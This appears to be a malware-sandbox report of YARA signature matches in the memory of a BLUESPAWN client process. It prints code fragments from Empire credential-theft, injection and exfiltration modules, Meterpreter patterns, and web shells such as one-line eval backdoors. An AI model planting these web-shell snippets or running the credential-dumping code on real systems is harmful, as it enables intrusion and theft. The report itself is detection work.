|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Install_SSP | Detects Empire component - file Install-SSP.ps1 | Florian Roth | - 0x2a8239:$s1: Install-SSP -Path .\mimilib.dll
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_ShellcodeMSIL | Detects Empire component - file Invoke-ShellcodeMSIL.ps1 | Florian Roth | - 0x2a8427:$s1: $FinalShellcode.Length
- 0x2a844a:$s2: @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)
- 0x2a8482:$s3: @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,
- 0x2a84b9:$s4: $TargetMethod.Invoke($null, @(0x11112222)) | Out-Null
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HKTL_Empire_PowerUp | Detects Empire component - file PowerUp.ps1 | Florian Roth | - 0x2a86a8:$x2: $PoolPasswordCmd = 'c:\windows\system32\inetsrv\appcmd.exe list apppool
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_Mimikatz_Gen | Detects Empire component - file Invoke-Mimikatz.ps1 | Florian Roth | - 0x2a88b8:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x2ae17e:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x2c7e89:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x2c84db:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x331583:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x331a71:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x2a88e9:$s2: Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, "Void", 0, "", $ExeArgs)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Get_GPPPassword | Detects Empire component - file Get-GPPPassword.ps1 | Florian Roth | - 0x2a8b1d:$s1: $Base64Decoded = [Convert]::FromBase64String($Cpassword)
- 0x2a8b62:$s2: $XMlFiles += Get-ChildItem -Path "\\$DomainController\SYSVOL" -Recurse
- 0x2ae372:$s2: $XMlFiles += Get-ChildItem -Path "\\$DomainController\SYSVOL" -Recurse
- 0x2a8bb5:$s3: function Get-DecryptedCpassword {
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_SmbScanner | Detects Empire component - file Invoke-SmbScanner.ps1 | Florian Roth | - 0x2a8d9f:$s1: $up = Test-Connection -count 1 -Quiet -ComputerName $Computer
- 0x2a8dea:$s2: $out | add-member Noteproperty 'Password' $Password
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Exploit_JBoss | Detects Empire component - file Exploit-JBoss.ps1 | Florian Roth | - 0x2a8e83:$s1: Exploit-JBoss
- 0x2a8fde:$s1: Exploit-JBoss
- 0x2ae5b6:$s1: Exploit-JBoss
- 0x2a8ff8:$s2: $URL = "http$($SSL)://" + $($Rhost) + ':' + $($Port)
- 0x2ae6a6:$s2: $URL = "http$($SSL)://" + $($Rhost) + ':' + $($Port)
- 0x2a9039:$s3: "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service
- 0x2ae6dd:$s3: "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service
- 0x2a9089:$s4: http://blog.rvrsh3ll.net
- 0x2a90ae:$s5: Remote URL to your own WARFile to deploy.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_dumpCredStore | Detects Empire component - file dumpCredStore.ps1 | Florian Roth | - 0x2a9298:$x1: [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredReadW"
- 0x2ae886:$x1: [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredReadW"
- 0x2a92ed:$s12: [String] $Msg = "Failed to enumerate credentials store for user '$Env:UserName'"
- 0x2a934a:$s15: Rtn = CredRead("Target", CRED_TYPE.GENERIC, out Cred);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_EgressCheck | Detects Empire component - file Invoke-EgressCheck.ps1 | Florian Roth | - 0x2a954b:$s1: egress -ip $ip -port $c -delay $delay -protocol $protocol
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Out_Minidump | Detects Empire component - file Out-Minidump.ps1 | Florian Roth | - 0x2a9971:$s1: $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
- 0x2a99ba:$s2: $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_PsExec | Detects Empire component - file Invoke-PsExec.ps1 | Florian Roth | - 0x2a9bb1:$s1: Invoke-PsExecCmd
- 0x2a9bce:$s2: "[*] Executing service .EXE
- 0x2a9bf6:$s3: $cmd = "%COMSPEC% /C echo $Command ^> %systemroot%\Temp\
- 0x2aef18:$s3: $cmd = "%COMSPEC% /C echo $Command ^> %systemroot%\Temp\
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_PostExfil | Detects Empire component - file Invoke-PostExfil.ps1 | Florian Roth | - 0x2a9df5:$s1: # upload to a specified exfil URI
- 0x2a9e23:$s2: Server path to exfil to.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_SMBAutoBrute | Detects Empire component - file Invoke-SMBAutoBrute.ps1 | Florian Roth | - 0x2aa008:$s1: [*] PDC: LAB-2008-DC1.lab.com
- 0x2aa032:$s2: $attempts = Get-UserBadPwdCount $userid $dcs
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Get_Keystrokes | Detects Empire component - file Get-Keystrokes.ps1 | Florian Roth | - 0x2aa221:$s1: $RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_DllInjection | Detects Empire component - file Invoke-DllInjection.ps1 | Florian Roth | - 0x2aa453:$s1: -Dll evil.dll
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_KeePassConfig | Detects Empire component - file KeePassConfig.ps1 | Florian Roth | - 0x2aa621:$s1: $UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_SSHCommand | Detects Empire component - file Invoke-SSHCommand.ps1 | Florian Roth | - 0x2aa861:$s1: $Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA
- 0x2af7a3:$s1: $Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA
- 0x2aa8a4:$s2: Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command "id"
- 0x2aa900:$s3: Write-Verbose "[*] Error loading dll"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerShell_Framework_Gen1 | Detects Empire component | Florian Roth | - 0x2aac6c:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x2afa83:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x2b57dc:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x2b82e3:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x2c7f83:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x331669:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x2aac9e:$s2: $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerUp_Gen | Detects Empire component - from files PowerUp.ps1, PowerUp.ps1 | Florian Roth | - 0x2aaee1:$s1: $Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath
- 0x2aaf33:$s2: $Result = sc.exe pause $($TargetService.Name)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerShell_Framework_Gen2 | Detects Empire component | Florian Roth | - 0x2ab2a7:$x1: $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
- 0x2ab325:$s20: #Shellcode: CallDllMain.asm
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Agent_Gen | Detects Empire component - from files agent.ps1, agent.ps1 | Florian Roth | - 0x2ab57c:$s1: $wc.Headers.Add("User-Agent",$script:UserAgent)
- 0x2ab5b8:$s2: $min = [int]((1-$script:AgentJitter)*$script:AgentDelay)
- 0x2ab5fd:$s3: if ($script:AgentDelay -ne 0){
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerShell_Framework_Gen3 | Detects Empire component | Florian Roth | - 0x2ab903:$s1: if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
- 0x2ab95e:$s2: remote DLL injection
- 0x2b03ae:$s2: remote DLL injection
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_InveighRelay_Gen | Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1 | Florian Roth | - 0x2abb79:$s1: $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
- 0x2abbea:$s2: $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_KeePassConfig_Gen | Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1 | Florian Roth | - 0x2abe2a:$s1: $KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_Portscan_Gen | Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1 | Florian Roth | - 0x2ac05b:$s1: Test-Port -h $h -p $Port -timeout $Timeout
- 0x2ac092:$s2: 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerShell_Framework_Gen4 | Detects Empire component | Florian Roth | - 0x2ac5e7:$s1: Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
- 0x2ac651:$s2: # Get a handle to the module specified
- 0x2ac684:$s3: $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
- 0x2ac6cb:$s4: $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen | Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1 | Florian Roth | - 0x2ac998:$s1: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle
- 0x2ac998:$s2: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs
- 0x2aca15:$s2: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_Gen | Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1 | Florian Roth | - 0x2acd31:$s1: $Shellcode1 += 0x48
- 0x2acd51:$s2: $PEHandle = [IntPtr]::Zero
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerShell_Framework_Gen5 | Detects Empire component | Florian Roth | - 0x2acff4:$s1: if ($ExeArgs -ne $null -and $ExeArgs -ne '')
- 0x2ad02d:$s2: $ExeArgs = "ReflectiveExe $ExeArgs"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Impacket_Tools_Generic_1 | Compiled Impacket Tools | Florian Roth | - 0x2b5364:$s1: bpywintypes27.dll
- 0x2b5382:$s2: hZFtPC
- 0x2b1fc7:$s3: impacket
- 0x2b21bb:$s3: impacket
- 0x2b23b0:$s3: impacket
- 0x2b2461:$s3: impacket
- 0x2b2587:$s3: impacket
- 0x2b2758:$s3: impacket
- 0x2b2814:$s3: impacket
- 0x2b2935:$s3: impacket
- 0x2b2af1:$s3: impacket
- 0x2b2cd1:$s3: impacket
- 0x2b2d82:$s3: impacket
- 0x2b2eb5:$s3: impacket
- 0x2b2f6a:$s3: impacket
- 0x2b3090:$s3: impacket
- 0x2b312c:$s3: impacket
- 0x2b3266:$s3: impacket
- 0x2b3440:$s3: impacket
- 0x2b34ef:$s3: impacket
- 0x2b3614:$s3: impacket
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_mimikittenz | Detects Mimikittenz - file Invoke-mimikittenz.ps1 | Florian Roth | - 0x2c4161:$x1: [mimikittenz.MemProcInspector]
- 0x32e8c3:$x1: [mimikittenz.MemProcInspector]
- 0x2c418c:$s1: PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |
- 0x2c4208:$s2: IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);
- 0x2c4293:$s3: &email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=
- 0x32e9d7:$s3: &email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=
- 0x2c42d8:$s4: [DllImport("kernel32.dll", SetLastError = true)]
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | |
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_PowerSploit | Yara detected PowerSploit | Joe Security | |
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security | |
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_Mimikatz_1 | Yara detected Mimikatz | Joe Security | |
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_Codoso_Ghost | Yara detected Codoso Ghost | Joe Security | |
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_Meterpreter | Yara detected Meterpreter | Joe Security | |
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security | |
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Meterpreter_Reverse_Tcp | Meterpreter reverse TCP backdoor in memory. Tested on Win7x64. | chort (@chort0) | - 0x154af9:$b: 4D 45 54 45 52 50 52 45 54 45 52 5F 55 41
- 0x167ac0:$b: 4D 45 54 45 52 50 52 45 54 45 52 5F 55 41
- 0x154b14:$c: 47 45 54 20 2F 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2F 31 2E 30
- 0x167ad0:$c: 47 45 54 20 2F 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2F 31 2E 30
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire__Users_neo_code_Workspace_Empire_4sigs_PowerUp | Detects Empire component - file PowerUp.ps1 | Florian Roth | - 0x2a86a8:$x2: $PoolPasswordCmd = 'c:\windows\system32\inetsrv\appcmd.exe list apppool
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_h4ntu_shell_powered_by_tsoi_ | Web Shell - file h4ntu shell [powered by tsoi | unknown | - 0x2d4a33:$s0: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b
- 0x33a320:$s0: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b
- 0x2d4a8e:$s3: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> ui
- 0x33a371:$s3: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> ui
- 0x2d4ae9:$s4: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?=
- 0x33a3c2:$s4: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?=
- 0x2d4b44:$s5: <INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($
- 0x33a413:$s5: <INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_sql | Web Shell - file sql.php | Florian Roth | - 0x2d4cc8:$s0: $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_
- 0x33a513:$s0: $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_
- 0x2d4d20:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x2fbf07:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x33a561:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x35570f:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_a | Web Shell - file a.php | Florian Roth | - 0x2d4e9a:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x325de4:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x33a657:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x37386a:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x2d4eeb:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x320374:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x325e5e:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x33a69e:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x36f772:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x3738da:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x2d4f3d:$s4: <input name="submit_btn" type="submit" value="Execute Command"></p>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_iMHaPFtp_2 | Web Shell - file iMHaPFtp.php | Florian Roth | - 0x2d50c2:$s8: if ($l) echo '<a href="' . $self . '?action=permission&file=' . urlencode($
- 0x33a7e7:$s8: if ($l) echo '<a href="' . $self . '?action=permission&file=' . urlencode($
- 0x2d511e:$s9: return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA
- 0x33a839:$s9: return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Jspspyweb | Web Shell - file Jspspyweb.jsp | Florian Roth | - 0x2d52af:$s0: out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7
- 0x33a946:$s0: out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7
- 0x2d530a:$s3: "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control
- 0x33a997:$s3: "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 | Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php | Florian Roth | - 0x2d54cc:$s0: die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n
- 0x33aad5:$s0: die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n
- 0x2d5526:$s1: Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color
- 0x33ab25:$s1: Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_SimAttacker_Vrsion_1_0_0_priv8_4_My_friend | Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php | Florian Roth | - 0x2d56f9:$s2: echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo
- 0x33ac74:$s2: echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo
- 0x2d5755:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x2f4711:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x33acc6:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x34fc4f:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_phpshell_2_1_pwhash | Web Shell - file pwhash.php | Florian Roth | - 0x2d58e9:$s1: <tt> </tt>" (space), "<tt>[</tt>" (left bracket), "<tt>|</tt>" (pi
- 0x33add6:$s1: <tt> </tt>" (space), "<tt>[</tt>" (left bracket), "<tt>|</tt>" (pi
- 0x2d593d:$s3: word: "<tt>null</tt>", "<tt>yes</tt>", "<tt>no</tt>", "<tt>true</tt>",
- 0x33ae20:$s3: word: "<tt>null</tt>", "<tt>yes</tt>", "<tt>no</tt>", "<tt>true</tt>",
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHPRemoteView | Web Shell - file PHPRemoteView.php | Florian Roth | - 0x2d5acc:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x2f678f:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x33af2b:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x3514b7:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x2d5b25:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x2d6201:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x33af7a:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x33b41e:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_jsp_12302 | Web Shell - file 12302.jsp | Florian Roth | - 0x2d5ca9:$s0: </font><%out.print(request.getRealPath(request.getServletPath())); %>
- 0x2d5cfb:$s1: <%@page import="java.io.*,java.util.*,java.net.*"%>
- 0x2d5d3b:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2db243:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x2dfe50:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33b0f8:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x33ea6b:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x341df0:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_guo | Web Shell - file guo.php | Florian Roth | - 0x2d5ec6:$s0: <?php ($www= $_POST['ice'])!
- 0x33b1ff:$s0: <?php ($www= $_POST['ice'])!
- 0x2d5eef:$s1: @preg_replace('/ad/e','@'.str_rot13('riny').'($ww
- 0x33b21e:$s1: @preg_replace('/ad/e','@'.str_rot13('riny').'($ww
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PHP_redcod | Web Shell - file redcod.php | Florian Roth | - 0x2d605f:$s0: H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw
- 0x2d6094:$s1: HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_remview_fix | Web Shell - file remview_fix.php | Florian Roth | - 0x2d5b25:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x2d6201:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x33af7a:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x33b41e:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x2d6255:$s5: echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
- 0x33b468:$s5: echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_cmd | Web Shell - file cmd.asp | Florian Roth | - 0x2d63c8:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2dc850:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2e1d7f:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x309fdf:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3171c1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2d6416:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x2f7185:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x2d6463:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x2e1dcd:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f48:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314eeb:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x31720f:$s3: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_sh_server | Web Shell - file server.php | Florian Roth | - 0x2d65eb:$s0: eval(getenv('HTTP_CODE'));
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_PH_Vayv_PH_Vayv | Web Shell - file PH Vayv.php | Florian Roth | - 0x2d674a:$s0: style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in
- 0x33b7bd:$s0: style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in
- 0x2d6796:$s4: <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style
- 0x33b7ff:$s4: <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_caidao_shell_ice | Web Shell - file ice.asp | Florian Roth | - 0x2d6920:$s0: <%eval request("ice")%>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_cihshell_fix | Web Shell - file cihshell_fix.php | Florian Roth | - 0x2d6a7e:$s7: <tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty
- 0x33b9df:$s7: <tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty
- 0x2d6adb:$s8: if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos
- 0x33ba32:$s8: if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_asp_shell | Web Shell - file shell.asp | Florian Roth | - 0x2d6c68:$s7: <input type="submit" name="Send" value="GO!">
- 0x2d6ca2:$s8: <TEXTAREA NAME="1988" ROWS="18" COLS="78"></TEXTAREA>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Private_i3lue | Web Shell - file Private-i3lue.php | Florian Roth | - 0x2d6e20:$s8: case 15: $image .= "\21\0\
- 0x33bc65:$s8: case 15: $image .= "\21\0\
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_php_up | Web Shell - file up.php | Florian Roth | - 0x2d6f71:$s0: copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
- 0x2d6fc3:$s3: if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
- 0x2d7010:$s8: echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Mysql_interface_v1_0 | Web Shell - file Mysql interface v1.0.php | Florian Roth | - 0x2d71a5:$s0: echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return
- 0x33bece:$s0: echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return
|
